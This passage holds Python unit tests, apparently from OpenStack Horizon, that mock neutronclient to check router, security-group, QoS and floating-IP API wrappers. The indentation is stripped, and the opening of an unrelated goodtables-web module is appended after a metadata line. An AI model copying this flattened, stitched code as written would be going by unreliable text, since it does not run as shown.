neutronclient = mock_neutronclient.return_value
neutronclient.list_routers.return_value = routers
ret_val = api.neutron.router_list(self.request)
for n in ret_val:
self.assertIsInstance(n, api.neutron.Router)
neutronclient.list_routers.assert_called_once_with()
@mock.patch.object(api.neutron, 'neutronclient')
def test_router_get(self, mock_neutronclient):
router = {'router': self.api_routers.first()}
router_id = self.api_routers.first()['id']
neutronclient = mock_neutronclient.return_value
neutronclient.show_router.return_value = router
ret_val = api.neutron.router_get(self.request, router_id)
self.assertIsInstance(ret_val, api.neutron.Router)
neutronclient.show_router.assert_called_once_with(router_id)
@mock.patch.object(api.neutron, 'neutronclient')
def test_router_create(self, mock_neutronclient):
router = {'router': self.api_routers.first()}
neutronclient = mock_neutronclient.return_value
form_data = {'router': {'name': 'router1',
'tenant_id': self.request.user.project_id}}
neutronclient.create_router.return_value = router
ret_val = api.neutron.router_create(self.request, name='router1')
self.assertIsInstance(ret_val, api.neutron.Router)
neutronclient.create_router.assert_called_once_with(body=form_data)
@mock.patch.object(api.neutron, 'neutronclient')
def test_router_delete(self, mock_neutronclient):
router_id = self.api_routers.first()['id']
neutronclient = mock_neutronclient.return_value
neutronclient.delete_router.return_value = None
api.neutron.router_delete(self.request, router_id)
neutronclient.delete_router.assert_called_once_with(router_id)
@mock.patch.object(api.neutron, 'neutronclient')
def test_router_add_interface(self, mock_neutronclient):
subnet_id = self.api_subnets.first()['id']
router_id = self.api_routers.first()['id']
neutronclient = mock_neutronclient.return_value
form_data = {'subnet_id': subnet_id}
neutronclient.add_interface_router.return_value = None
api.neutron.router_add_interface(
self.request, router_id, subnet_id=subnet_id)
neutronclient.add_interface_router.assert_called_once_with(router_id,
form_data)
@mock.patch.object(api.neutron, 'neutronclient')
def test_router_remove_interface(self, mock_neutronclient):
router_id = self.api_routers.first()['id']
fake_port = self.api_ports.first()['id']
neutronclient = mock_neutronclient.return_value
neutronclient.remove_interface_router.return_value = None
api.neutron.router_remove_interface(
self.request, router_id, port_id=fake_port)
neutronclient.remove_interface_router.assert_called_once_with(
router_id, {'port_id': fake_port})
# Mocking neutronclient() does not work because api.neutron.list_extensions
# is decorated with memoized_with_request, so we need to mock
# neutronclient.v2_0.client directly.
@mock.patch('neutronclient.v2_0.client.Client.list_extensions')
def test_is_extension_supported(self, mock_list_extensions):
extensions = self.api_extensions.list()
mock_list_extensions.return_value = {'extensions': extensions}
self.assertTrue(
api.neutron.is_extension_supported(self.request, 'quotas'))
self.assertFalse(
api.neutron.is_extension_supported(self.request, 'doesntexist'))
mock_list_extensions.assert_called_once_with()
@mock.patch.object(api.neutron, 'neutronclient')
def test_router_static_route_list(self, mock_neutronclient):
router = {'router': self.api_routers_with_routes.first()}
router_id = self.api_routers_with_routes.first()['id']
neutronclient = mock_neutronclient.return_value
neutronclient.show_router.return_value = router
ret_val = api.neutron.router_static_route_list(self.request, router_id)
self.assertIsInstance(ret_val[0], api.neutron.RouterStaticRoute)
neutronclient.show_router.assert_called_once_with(router_id)
@mock.patch.object(api.neutron, 'neutronclient')
def test_router_static_route_remove(self, mock_neutronclient):
router = {'router': self.api_routers_with_routes.first()}
router_id = self.api_routers_with_routes.first()['id']
post_router = copy.deepcopy(router)
route = api.neutron.RouterStaticRoute(post_router['router']
['routes'].pop())
neutronclient = mock_neutronclient.return_value
neutronclient.show_router.return_value = router
neutronclient.update_router.return_value = post_router
api.neutron.router_static_route_remove(self.request,
router_id, route.id)
neutronclient.show_router.assert_called_once_with(router_id)
body = {'router': {'routes': post_router['router']['routes']}}
neutronclient.update_router.assert_called_once_with(
router_id, body=body)
@mock.patch.object(api.neutron, 'neutronclient')
def test_router_static_route_add(self, mock_neutronclient):
router = {'router': self.api_routers_with_routes.first()}
router_id = self.api_routers_with_routes.first()['id']
post_router = copy.deepcopy(router)
route = {'nexthop': '10.0.0.5', 'destination': '40.0.1.0/24'}
post_router['router']['routes'].insert(0, route)
body = {'router': {'routes': post_router['router']['routes']}}
neutronclient = mock_neutronclient.return_value
neutronclient.show_router.return_value = router
neutronclient.update_router.return_value = post_router
api.neutron.router_static_route_add(self.request, router_id, route)
neutronclient.show_router.assert_called_once_with(router_id)
neutronclient.update_router.assert_called_once_with(router_id,
body=body)
    # NOTE(amotoki): The "dvr" permission tests cover most of the
    # get_feature_permission features. These tests are not specific to the
    # "dvr" extension, so be careful if you drop the "dvr" extension in future.
@override_settings(OPENSTACK_NEUTRON_NETWORK={'enable_distributed_router':
True},
POLICY_CHECK_FUNCTION=None)
@test.create_mocks({api.neutron: ('is_extension_supported',)})
def _test_get_dvr_permission_dvr_supported(self, dvr_enabled):
self.mock_is_extension_supported.return_value = dvr_enabled
self.assertEqual(dvr_enabled,
api.neutron.get_feature_permission(self.request,
'dvr', 'get'))
self.mock_is_extension_supported.assert_called_once_with(
self.request, 'dvr')
def test_get_dvr_permission_dvr_supported(self):
self._test_get_dvr_permission_dvr_supported(dvr_enabled=True)
def test_get_dvr_permission_dvr_not_supported(self):
self._test_get_dvr_permission_dvr_supported(dvr_enabled=False)
@override_settings(OPENSTACK_NEUTRON_NETWORK={'enable_distributed_router':
True},
POLICY_CHECK_FUNCTION='openstack_auth.policy.check')
@test.create_mocks({api.neutron: ('is_extension_supported',),
policy: ('check',)})
def _test_get_dvr_permission_with_policy_check(self, policy_check_allowed,
operation):
if operation == "create":
role = (("network", "create_router:distributed"),)
elif operation == "get":
role = (("network", "get_router:distributed"),)
self.mock_check.return_value = policy_check_allowed
self.mock_is_extension_supported.return_value = policy_check_allowed
self.assertEqual(policy_check_allowed,
api.neutron.get_feature_permission(self.request,
'dvr', operation))
self.mock_check.assert_called_once_with(role, self.request)
if policy_check_allowed:
self.mock_is_extension_supported.assert_called_once_with(
self.request, 'dvr')
else:
self.mock_is_extension_supported.assert_not_called()
def test_get_dvr_permission_with_policy_check_allowed(self):
self._test_get_dvr_permission_with_policy_check(True, "get")
def test_get_dvr_permission_with_policy_check_disallowed(self):
self._test_get_dvr_permission_with_policy_check(False, "get")
def test_get_dvr_permission_create_with_policy_check_allowed(self):
self._test_get_dvr_permission_with_policy_check(True, "create")
def test_get_dvr_permission_create_with_policy_check_disallowed(self):
self._test_get_dvr_permission_with_policy_check(False, "create")
@override_settings(OPENSTACK_NEUTRON_NETWORK={'enable_distributed_router':
False})
def test_get_dvr_permission_dvr_disabled_by_config(self):
self.assertFalse(api.neutron.get_feature_permission(self.request,
'dvr', 'get'))
@override_settings(OPENSTACK_NEUTRON_NETWORK={'enable_distributed_router':
True},
POLICY_CHECK_FUNCTION='openstack_auth.policy.check')
def test_get_dvr_permission_dvr_unsupported_operation(self):
self.assertRaises(ValueError,
api.neutron.get_feature_permission,
self.request, 'dvr', 'unSupported')
@override_settings(OPENSTACK_NEUTRON_NETWORK={})
def test_get_dvr_permission_dvr_default_config(self):
self.assertFalse(api.neutron.get_feature_permission(self.request,
'dvr', 'get'))
@override_settings(OPENSTACK_NEUTRON_NETWORK={})
def test_get_dvr_permission_router_ha_default_config(self):
self.assertFalse(api.neutron.get_feature_permission(self.request,
'l3-ha', 'get'))
    # NOTE(amotoki): Most of get_feature_permission is covered by the "dvr"
    # checks above. The l3-ha check below only covers l3-ha specific code.
@override_settings(OPENSTACK_NEUTRON_NETWORK={'enable_ha_router': True},
POLICY_CHECK_FUNCTION='openstack_auth.policy.check')
@test.create_mocks({api.neutron: ('is_extension_supported',),
policy: ('check',)})
def _test_get_router_ha_permission_with_policy_check(self, ha_enabled):
role = (("network", "create_router:ha"),)
self.mock_check.return_value = True
self.mock_is_extension_supported.return_value = ha_enabled
self.assertEqual(ha_enabled,
api.neutron.get_feature_permission(self.request,
'l3-ha', 'create'))
self.mock_check.assert_called_once_with(role, self.request)
self.mock_is_extension_supported.assert_called_once_with(self.request,
'l3-ha')
def test_get_router_ha_permission_with_l3_ha_extension(self):
self._test_get_router_ha_permission_with_policy_check(True)
def test_get_router_ha_permission_without_l3_ha_extension(self):
self._test_get_router_ha_permission_with_policy_check(False)
@mock.patch.object(api.neutron, 'neutronclient')
def test_list_resources_with_long_filters(self, mock_neutronclient):
        # In this test, port_list is called with an id filter containing
        # 10 port IDs, which generates a URI roughly 40*10 characters long.
# Each port ID is converted to "id=<UUID>&" in URI and
# it means 40 chars (len(UUID)=36).
# If excess length is 220, it means 400-220=180 chars
# can be sent in the first request.
# As a result three API calls with 4, 4, 2 port ID
# are expected.
ports = [{'id': uuidutils.generate_uuid(),
'name': 'port%s' % i,
'admin_state_up': True}
for i in range(10)]
port_ids = tuple([port['id'] for port in ports])
neutronclient = mock_neutronclient.return_value
uri_len_exc = neutron_exc.RequestURITooLong(excess=220)
list_ports_retval = [uri_len_exc]
for i in range(0, 10, 4):
list_ports_retval.append({'ports': ports[i:i + 4]})
neutronclient.list_ports.side_effect = list_ports_retval
ret_val = api.neutron.list_resources_with_long_filters(
api.neutron.port_list, 'id', tuple(port_ids),
request=self.request)
self.assertEqual(10, len(ret_val))
self.assertEqual(port_ids, tuple([p.id for p in ret_val]))
expected_calls = []
expected_calls.append(mock.call(id=tuple(port_ids)))
for i in range(0, 10, 4):
expected_calls.append(mock.call(id=tuple(port_ids[i:i + 4])))
neutronclient.list_ports.assert_has_calls(expected_calls)
@mock.patch.object(api.neutron, 'neutronclient')
def test_qos_policies_list(self, mock_neutronclient):
exp_policies = self.qos_policies.list()
api_qos_policies = {'policies': self.api_qos_policies.list()}
neutronclient = mock_neutronclient.return_value
neutronclient.list_qos_policies.return_value = api_qos_policies
ret_val = api.neutron.policy_list(self.request)
self.assertEqual(len(ret_val), len(exp_policies))
self.assertIsInstance(ret_val[0], api.neutron.QoSPolicy)
self.assertEqual(exp_policies[0].name, ret_val[0].name)
neutronclient.list_qos_policies.assert_called_once_with()
@mock.patch.object(api.neutron, 'neutronclient')
def test_qos_policy_create(self, mock_neutronclient):
qos_policy = self.api_qos_policies.first()
post_data = {'policy': {'name': qos_policy['name']}}
neutronclient = mock_neutronclient.return_value
neutronclient.create_qos_policy.return_value = {'policy': qos_policy}
ret_val = api.neutron.policy_create(self.request,
name=qos_policy['name'])
self.assertIsInstance(ret_val, api.neutron.QoSPolicy)
self.assertEqual(qos_policy['name'], ret_val.name)
neutronclient.create_qos_policy.assert_called_once_with(body=post_data)
class NeutronApiSecurityGroupTests(test.APIMockTestCase):
def setUp(self):
super(NeutronApiSecurityGroupTests, self).setUp()
neutronclient = mock.patch.object(api.neutron, 'neutronclient').start()
self.qclient = neutronclient.return_value
self.sg_dict = dict([(sg['id'], sg['name']) for sg
in self.api_security_groups.list()])
def _cmp_sg_rule(self, exprule, retrule):
self.assertEqual(exprule['id'], retrule.id)
self.assertEqual(exprule['security_group_id'],
retrule.parent_group_id)
self.assertEqual(exprule['direction'],
retrule.direction)
self.assertEqual(exprule['ethertype'],
retrule.ethertype)
self.assertEqual(exprule['port_range_min'],
retrule.from_port)
self.assertEqual(exprule['port_range_max'],
retrule.to_port,)
if (exprule['remote_ip_prefix'] is None and
exprule['remote_group_id'] is None):
expcidr = ('::/0' if exprule['ethertype'] == 'IPv6'
else '0.0.0.0/0')
else:
expcidr = exprule['remote_ip_prefix']
self.assertEqual(expcidr, retrule.ip_range.get('cidr'))
self.assertEqual(self.sg_dict.get(exprule['remote_group_id']),
retrule.group.get('name'))
def _cmp_sg(self, exp_sg, ret_sg):
self.assertEqual(exp_sg['id'], ret_sg.id)
self.assertEqual(exp_sg['name'], ret_sg.name)
exp_rules = exp_sg['security_group_rules']
self.assertEqual(len(exp_rules), len(ret_sg.rules))
for (exprule, retrule) in six.moves.zip(exp_rules, ret_sg.rules):
self._cmp_sg_rule(exprule, retrule)
def _test_security_group_list(self, **params):
sgs = self.api_security_groups.list()
q_params = {'tenant_id': self.request.user.tenant_id}
# if tenant_id is specified, the passed tenant_id should be sent.
q_params.update(params)
# use deepcopy to ensure self.api_security_groups is not modified.
self.qclient.list_security_groups.return_value = {'security_groups':
copy.deepcopy(sgs)}
rets = api.neutron.security_group_list(self.request, **params)
self.assertEqual(len(sgs), len(rets))
for (exp, ret) in six.moves.zip(sgs, rets):
self._cmp_sg(exp, ret)
self.qclient.list_security_groups.assert_called_once_with(**q_params)
def test_security_group_list(self):
self._test_security_group_list()
def test_security_group_list_with_params(self):
self._test_security_group_list(name='sg1')
def test_security_group_list_with_tenant_id(self):
self._test_security_group_list(tenant_id='tenant1', name='sg1')
def test_security_group_get(self):
secgroup = self.api_security_groups.first()
sg_ids = set([secgroup['id']] +
[rule['remote_group_id'] for rule
in secgroup['security_group_rules']
if rule['remote_group_id']])
related_sgs = [sg for sg in self.api_security_groups.list()
if sg['id'] in sg_ids]
# use deepcopy to ensure self.api_security_groups is not modified.
self.qclient.show_security_group.return_value = \
{'security_group': copy.deepcopy(secgroup)}
self.qclient.list_security_groups.return_value = \
{'security_groups': related_sgs}
ret = api.neutron.security_group_get(self.request, secgroup['id'])
self._cmp_sg(secgroup, ret)
self.qclient.show_security_group.assert_called_once_with(
secgroup['id'])
self.qclient.list_security_groups.assert_called_once_with(
id=sg_ids, fields=['id', 'name'])
def test_security_group_create(self):
secgroup = self.api_security_groups.list()[1]
body = {'security_group':
{'name': secgroup['name'],
'description': secgroup['description'],
'tenant_id': self.request.user.project_id}}
self.qclient.create_security_group.return_value = \
{'security_group': copy.deepcopy(secgroup)}
ret = api.neutron.security_group_create(self.request, secgroup['name'],
secgroup['description'])
self._cmp_sg(secgroup, ret)
self.qclient.create_security_group.assert_called_once_with(body)
def test_security_group_update(self):
secgroup = self.api_security_groups.list()[1]
secgroup = copy.deepcopy(secgroup)
secgroup['name'] = 'newname'
secgroup['description'] = 'new description'
body = {'security_group':
{'name': secgroup['name'],
'description': secgroup['description']}}
self.qclient.update_security_group.return_value = {'security_group':
secgroup}
ret = api.neutron.security_group_update(self.request,
secgroup['id'],
secgroup['name'],
secgroup['description'])
self._cmp_sg(secgroup, ret)
self.qclient.update_security_group.assert_called_once_with(
secgroup['id'], body)
def test_security_group_delete(self):
secgroup = self.api_security_groups.first()
self.qclient.delete_security_group.return_value = None
api.neutron.security_group_delete(self.request, secgroup['id'])
self.qclient.delete_security_group.assert_called_once_with(
secgroup['id'])
def test_security_group_rule_create(self):
self._test_security_group_rule_create(with_desc=True)
def test_security_group_rule_create_without_desc(self):
self._test_security_group_rule_create(with_desc=False)
def test_security_group_rule_create_with_custom_protocol(self):
self._test_security_group_rule_create(custom_ip_proto=True)
def _test_security_group_rule_create(self, with_desc=False,
custom_ip_proto=False):
if custom_ip_proto:
sg_rule = [r for r in self.api_security_group_rules.list()
if r['protocol'] == '99'][0]
else:
sg_rule = [r for r in self.api_security_group_rules.list()
if r['protocol'] == 'tcp' and r['remote_ip_prefix']][0]
sg_id = sg_rule['security_group_id']
secgroup = [sg for sg in self.api_security_groups.list()
if sg['id'] == sg_id][0]
post_rule = copy.deepcopy(sg_rule)
del post_rule['id']
del post_rule['tenant_id']
if not with_desc:
del post_rule['description']
post_body = {'security_group_rule': post_rule}
self.qclient.create_security_group_rule.return_value = \
{'security_group_rule': copy.deepcopy(sg_rule)}
self.qclient.list_security_groups.return_value = \
{'security_groups': [copy.deepcopy(secgroup)]}
if with_desc:
description = sg_rule['description']
else:
description = None
ret = api.neutron.security_group_rule_create(
self.request, sg_rule['security_group_id'],
sg_rule['direction'], sg_rule['ethertype'], sg_rule['protocol'],
sg_rule['port_range_min'], sg_rule['port_range_max'],
sg_rule['remote_ip_prefix'], sg_rule['remote_group_id'],
description)
self._cmp_sg_rule(sg_rule, ret)
self.qclient.create_security_group_rule.assert_called_once_with(
post_body)
self.qclient.list_security_groups.assert_called_once_with(
id=set([sg_id]), fields=['id', 'name'])
def test_security_group_rule_delete(self):
sg_rule = self.api_security_group_rules.first()
self.qclient.delete_security_group_rule.return_value = None
api.neutron.security_group_rule_delete(self.request, sg_rule['id'])
self.qclient.delete_security_group_rule.assert_called_once_with(
sg_rule['id'])
def _get_instance(self, cur_sg_ids):
instance_port = [p for p in self.api_ports.list()
if p['device_owner'].startswith('compute:')][0]
instance_id = instance_port['device_id']
# Emulate an instance with two ports
instance_ports = []
for _i in range(2):
p = copy.deepcopy(instance_port)
p['id'] = uuidutils.generate_uuid()
p['security_groups'] = cur_sg_ids
instance_ports.append(p)
return (instance_id, instance_ports)
def test_server_security_groups(self):
cur_sg_ids = [sg['id'] for sg in self.api_security_groups.list()[:2]]
instance_id, instance_ports = self._get_instance(cur_sg_ids)
self.qclient.list_ports.return_value = {'ports': instance_ports}
secgroups = copy.deepcopy(self.api_security_groups.list())
self.qclient.list_security_groups.return_value = \
{'security_groups': secgroups}
api.neutron.server_security_groups(self.request, instance_id)
self.qclient.list_ports.assert_called_once_with(device_id=instance_id)
self.qclient.list_security_groups.assert_called_once_with(
id=set(cur_sg_ids))
def test_server_update_security_groups(self):
cur_sg_ids = [self.api_security_groups.first()['id']]
new_sg_ids = [sg['id'] for sg in self.api_security_groups.list()[:2]]
instance_id, instance_ports = self._get_instance(cur_sg_ids)
self.qclient.list_ports.return_value = {'ports': instance_ports}
self.qclient.update_port.side_effect = \
[{'port': p} for p in instance_ports]
api.neutron.server_update_security_groups(
self.request, instance_id, new_sg_ids)
self.qclient.list_ports.assert_called_once_with(device_id=instance_id)
body = {'port': {'security_groups': new_sg_ids}}
expected_calls = [mock.call(p['id'], body=body)
for p in instance_ports]
self.qclient.update_port.assert_has_calls(expected_calls)
class NeutronApiFloatingIpTests(test.APIMockTestCase):
def setUp(self):
super(NeutronApiFloatingIpTests, self).setUp()
neutronclient = mock.patch.object(api.neutron, 'neutronclient').start()
self.qclient = neutronclient.return_value
@override_settings(OPENSTACK_NEUTRON_NETWORK={'enable_router': True})
def test_floating_ip_supported(self):
self.assertTrue(api.neutron.floating_ip_supported(self.request))
@override_settings(OPENSTACK_NEUTRON_NETWORK={'enable_router': False})
def test_floating_ip_supported_false(self):
self.assertFalse(api.neutron.floating_ip_supported(self.request))
def test_floating_ip_pools_list(self):
search_opts = {'router:external': True}
ext_nets = [n for n in self.api_networks.list()
if n['router:external']]
self.qclient.list_networks.return_value = {'networks': ext_nets}
rets = api.neutron.floating_ip_pools_list(self.request)
for attr in ['id', 'name']:
self.assertEqual([p[attr] for p in ext_nets],
[getattr(p, attr) for p in rets])
self.qclient.list_networks.assert_called_once_with(**search_opts)
def test_floating_ip_list(self):
fips = self.api_floating_ips.list()
filters = {'tenant_id': self.request.user.tenant_id}
self.qclient.list_floatingips.return_value = {'floatingips': fips}
self.qclient.list_ports.return_value = {'ports': self.api_ports.list()}
rets = api.neutron.tenant_floating_ip_list(self.request)
assoc_port = self.api_ports.list()[1]
self.assertEqual(len(fips), len(rets))
for ret, exp in zip(rets, fips):
for attr in ['id', 'ip', 'pool', 'fixed_ip', 'port_id']:
self.assertEqual(exp[attr], getattr(ret, attr))
if exp['port_id']:
dev_id = assoc_port['device_id'] if exp['port_id'] else None
self.assertEqual(dev_id, ret.instance_id)
self.assertEqual('compute', ret.instance_type)
else:
self.assertIsNone(ret.instance_id)
self.assertIsNone(ret.instance_type)
self.qclient.list_floatingips.assert_called_once_with(**filters)
self.qclient.list_ports.assert_called_once_with(**filters)
def test_floating_ip_list_all_tenants(self):
fips = self.api_floating_ips.list()
self.qclient.list_floatingips.return_value = {'floatingips': fips}
self.qclient.list_ports.return_value = {'ports': self.api_ports.list()}
fip_manager = api.neutron.FloatingIpManager(self.request)
rets = fip_manager.list(all_tenants=True)
assoc_port = self.api_ports.list()[1]
self.assertEqual(len(fips), len(rets))
for ret, exp in zip(rets, fips):
for attr in ['id', 'ip', 'pool', 'fixed_ip', 'port_id']:
self.assertEqual(getattr(ret, attr), exp[attr])
if exp['port_id']:
dev_id = assoc_port['device_id'] if exp['port_id'] else None
self.assertEqual(dev_id, ret.instance_id)
self.assertEqual('compute', ret.instance_type)
else:
self.assertIsNone(ret.instance_id)
self.assertIsNone(ret.instance_type)
self.qclient.list_floatingips.assert_called_once_with()
self.qclient.list_ports.assert_called_once_with()
def _test_floating_ip_get_associated(self, assoc_port, exp_instance_type):
fip = self.api_floating_ips.list()[1]
self.qclient.show_floatingip.return_value = {'floatingip': fip}
self.qclient.show_port.return_value = {'port': assoc_port}
ret = api.neutron.tenant_floating_ip_get(self.request, fip['id'])
for attr in ['id', 'ip', 'pool', 'fixed_ip', 'port_id']:
self.assertEqual(fip[attr], getattr(ret, attr))
self.assertEqual(assoc_port['device_id'], ret.instance_id)
self.assertEqual(exp_instance_type, ret.instance_type)
self.qclient.show_floatingip.assert_called_once_with(fip['id'])
self.qclient.show_port.assert_called_once_with(assoc_port['id'])
def test_floating_ip_get_associated(self):
assoc_port = self.api_ports.list()[1]
self._test_floating_ip_get_associated(assoc_port, 'compute')
def test_floating_ip_get_associated_with_loadbalancer_vip(self):
assoc_port = copy.deepcopy(self.api_ports.list()[1])
assoc_port['device_owner'] = 'neutron:LOADBALANCER'
assoc_port['device_id'] = uuidutils.generate_uuid()
assoc_port['name'] = 'vip-' + uuidutils.generate_uuid()
self._test_floating_ip_get_associated(assoc_port, 'loadbalancer')
def test_floating_ip_get_unassociated(self):
fip = self.api_floating_ips.list()[0]
self.qclient.show_floatingip.return_value = {'floatingip': fip}
ret = api.neutron.tenant_floating_ip_get(self.request, fip['id'])
for attr in ['id', 'ip', 'pool', 'fixed_ip', 'port_id']:
self.assertEqual(fip[attr], getattr(ret, attr))
self.assertIsNone(ret.instance_id)
self.assertIsNone(ret.instance_type)
self.qclient.show_floatingip.assert_called_once_with(fip['id'])
def test_floating_ip_allocate(self):
ext_nets = [n for n in self.api_networks.list()
if n['router:external']]
ext_net = ext_nets[0]
fip = self.api_floating_ips.first()
self.qclient.create_floatingip.return_value = {'floatingip': fip}
ret = api.neutron.tenant_floating_ip_allocate(self.request,
ext_net['id'])
for attr in ['id', 'ip', 'pool', 'fixed_ip', 'port_id']:
self.assertEqual(fip[attr], getattr(ret, attr))
self.assertIsNone(ret.instance_id)
self.assertIsNone(ret.instance_type)
self.qclient.create_floatingip.assert_called_once_with(
{'floatingip': {'floating_network_id': ext_net['id'],
'tenant_id': self.request.user.project_id}})
def test_floating_ip_release(self):
fip = self.api_floating_ips.first()
self.qclient.delete_floatingip.return_value = None
api.neutron.tenant_floating_ip_release(self.request, fip['id'])
self.qclient.delete_floatingip.assert_called_once_with(fip['id'])
def test_floating_ip_associate(self):
fip = self.api_floating_ips.list()[1]
assoc_port = self.api_ports.list()[1]
ip_address = assoc_port['fixed_ips'][0]['ip_address']
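        # floating_ip_associate() expects the target as '<port_id>_<fixed_ip_address>'.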
target_id = '%s_%s' % (assoc_port['id'], ip_address)
params = {'port_id': assoc_port['id'],
'fixed_ip_address': ip_address}
self.qclient.update_floatingip.return_value = None
api.neutron.floating_ip_associate(self.request, fip['id'], target_id)
self.qclient.update_floatingip.assert_called_once_with(
fip['id'], {'floatingip': params})
def test_floating_ip_disassociate(self):
fip = self.api_floating_ips.list()[1]
self.qclient.update_floatingip.return_value = None
api.neutron.floating_ip_disassociate(self.request, fip['id'])
self.qclient.update_floatingip.assert_called_once_with(
fip['id'], {'floatingip': {'port_id': None}})
def _get_target_id(self, port, ip=None, index=0):
param = {'id': port['id'],
'addr': ip or port['fixed_ips'][index]['ip_address']}
return '%(id)s_%(addr)s' % param
def _get_target_name(self, port, ip=None):
param = {'svrid': port['device_id'],
'addr': ip or port['fixed_ips'][0]['ip_address']}
return 'server_%(svrid)s: %(addr)s' % param
@override_settings(
OPENSTACK_NEUTRON_NETWORK={
'enable_fip_topology_check': True,
}
)
@mock.patch.object(api._nova, 'novaclient')
def test_floating_ip_target_list(self, mock_novaclient):
ports = self.api_ports.list()
# Port on the first subnet is connected to a router
# attached to external network in neutron_data.
subnet_id = self.subnets.first().id
shared_nets = [n for n in self.api_networks.list() if n['shared']]
shared_subnet_ids = [s for n in shared_nets for s in n['subnets']]
target_ports = []
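        # Build the expected (target id, target name) pairs: skip network-owned ports,
        # keep only ports on the routed first subnet or a shared subnet, and use only
        # their IPv4 fixed IPs.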
for p in ports:
if p['device_owner'].startswith('network:'):
continue
port_subnets = [ip['subnet_id'] for ip in p['fixed_ips']]
if not (subnet_id in port_subnets or
(set(shared_subnet_ids) & set(port_subnets))):
continue
for ip in p['fixed_ips']:
if netaddr.IPAddress(ip['ip_address']).version != 4:
continue
target_ports.append((
self._get_target_id(p, ip['ip_address']),
self._get_target_name(p, ip['ip_address'])))
filters = {'tenant_id': self.request.user.tenant_id}
self.qclient.list_ports.return_value = {'ports': ports}
servers = self.servers.list()
novaclient = mock_novaclient.return_value
ver = mock.Mock(min_version='2.1', version='2.45')
novaclient.versions.get_current.return_value = ver
novaclient.servers.list.return_value = servers
ext_nets = [n for n in self.api_networks.list()
if n['router:external']]
list_networks_retvals = [{'networks': ext_nets},
{'networks': shared_nets}]
self.qclient.list_networks.side_effect = list_networks_retvals
self.qclient.list_routers.return_value = {'routers':
self.api_routers.list()}
shared_subs = [s for s in self.api_subnets.list()
if s['id'] in shared_subnet_ids]
self.qclient.list_subnets.return_value = {'subnets': shared_subs}
rets = api.neutron.floating_ip_target_list(self.request)
self.assertEqual(len(target_ports), len(rets))
for ret, exp in zip(rets, target_ports):
pid, ip_address = ret.id.split('_', 1)
            self.assertEqual(4, netaddr.IPAddress(ip_address).version)
self.assertEqual(exp[0], ret.id)
self.assertEqual(exp[1], ret.name)
self.qclient.list_ports.assert_called_once_with(**filters)
novaclient.versions.get_current.assert_called_once_with()
novaclient.servers.list.assert_called_once_with(
False, {'project_id': self.request.user.tenant_id})
self.qclient.list_networks.assert_has_calls([
mock.call(**{'router:external': True}),
mock.call(shared=True),
])
self.qclient.list_routers.assert_called_once_with()
self.qclient.list_subnets.assert_called_once_with()
@mock.patch.object(api._nova, 'novaclient')
def _test_target_floating_ip_port_by_instance(self, server, ports,
candidates, mock_novaclient):
# list_ports and list_networks are called multiple times,
# we prepare a list for return values.
list_ports_retvals = []
self.qclient.list_ports.side_effect = list_ports_retvals
list_nets_retvals = []
self.qclient.list_networks.side_effect = list_nets_retvals
# _target_ports_by_instance()
list_ports_retvals.append({'ports': candidates})
# _get_reachable_subnets()
ext_nets = [n for n in self.api_networks.list()
if n['router:external']]
list_nets_retvals.append({'networks': ext_nets})
self.qclient.list_routers.side_effect = [{'routers':
self.api_routers.list()}]
rinfs = [p for p in ports
if p['device_owner'] in api.neutron.ROUTER_INTERFACE_OWNERS]
list_ports_retvals.append({'ports': rinfs})
shared_nets = [n for n in self.api_networks.list() if n['shared']]
list_nets_retvals.append({'networks': shared_nets})
shared_subnet_ids = [s for n in shared_nets for s in n['subnets']]
shared_subs = [s for s in self.api_subnets.list()
if s['id'] in shared_subnet_ids]
self.qclient.list_subnets.side_effect = [{'subnets': shared_subs}]
# _get_server_name()
novaclient = mock_novaclient.return_value
ver = mock.Mock(min_version='2.1', version='2.45')
novaclient.versions.get_current.return_value = ver
novaclient.servers.get.return_value = server
ret_val = api.neutron.floating_ip_target_list_by_instance(self.request,
server.id)
self.qclient.list_ports.assert_has_calls([
mock.call(device_id=server.id),
mock.call(device_owner=api.neutron.ROUTER_INTERFACE_OWNERS),
])
self.qclient.list_networks.assert_has_calls([
mock.call(**{'router:external': True}),
mock.call(shared=True),
])
self.qclient.list_routers.assert_called_once_with()
self.qclient.list_subnets.assert_called_once_with()
novaclient.versions.get_current.assert_called_once_with()
novaclient.servers.get.assert_called_once_with(server.id)
return ret_val
def test_target_floating_ip_port_by_instance(self):
server = self.servers.first()
ports = self.api_ports.list()
candidates = [p for p in ports if p['device_id'] == server.id]
ret = self._test_target_floating_ip_port_by_instance(server, ports,
candidates)
self.assertEqual(1, len(ret))
ret_val = ret[0]
self.assertEqual(self._get_target_id(candidates[0]), ret_val.id)
self.assertEqual(candidates[0]['id'], ret_val.port_id)
self.assertEqual(candidates[0]['device_id'], ret_val.instance_id)
def test_target_floating_ip_port_by_instance_with_ipv6(self):
server = self.servers.first()
ports = self.api_ports.list()
candidates = [p for p in ports if p['device_id'] == server.id]
# Move the IPv6 entry first
fixed_ips = candidates[0]['fixed_ips']
candidates[0]['fixed_ips'] = [fixed_ips[1], fixed_ips[0]]
# Check the first IP address is IPv6
first_ip = candidates[0]['fixed_ips'][0]['ip_address']
self.assertEqual(6, netaddr.IPAddress(first_ip).version)
ret = self._test_target_floating_ip_port_by_instance(server, ports,
candidates)
self.assertEqual(1, len(ret))
ret_val = ret[0]
self.assertEqual(self._get_target_id(candidates[0], index=1),
ret_val.id)
self.assertEqual(candidates[0]['id'], ret_val.port_id)
self.assertEqual(candidates[0]['device_id'], ret_val.instance_id)
def _get_preloaded_targets(self):
return [
api.neutron.FloatingIpTarget(
api.neutron.Port({'name': 'name11', 'id': 'id11',
'device_id': 'id-vm1'}),
'192.168.1.1', 'vm1'),
api.neutron.FloatingIpTarget(
api.neutron.Port({'name': 'name21', 'id': 'id21',
'device_id': 'id-vm2'}),
'172.16.1.1', 'vm2'),
api.neutron.FloatingIpTarget(
api.neutron.Port({'name': 'name22', 'id': 'id22',
'device_id': 'id-vm2'}),
'10.11.12.13', 'vm3'),
]
def test_target_floating_ip_port_by_instance_with_preloaded_target(self):
target_list = self._get_preloaded_targets()
ret = api.neutron.floating_ip_target_list_by_instance(
self.request, 'id-vm2', target_list)
self.assertEqual(['id21', 'id22'], [r.port_id for r in ret])
| apache-2.0 | -9,127,317,398,460,591,000 | 44.06191 | 79 | 0.608728 | false |
okfn/goodtables-web | web/components/commons/view_mixins.py | 1 | 1387 | # -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import os
from werkzeug.datastructures import FileStorage
from flask import current_app as app
from goodtables.pipeline import Pipeline
from . import utilities
from ... import compat
class RunPipelineMixin(object):
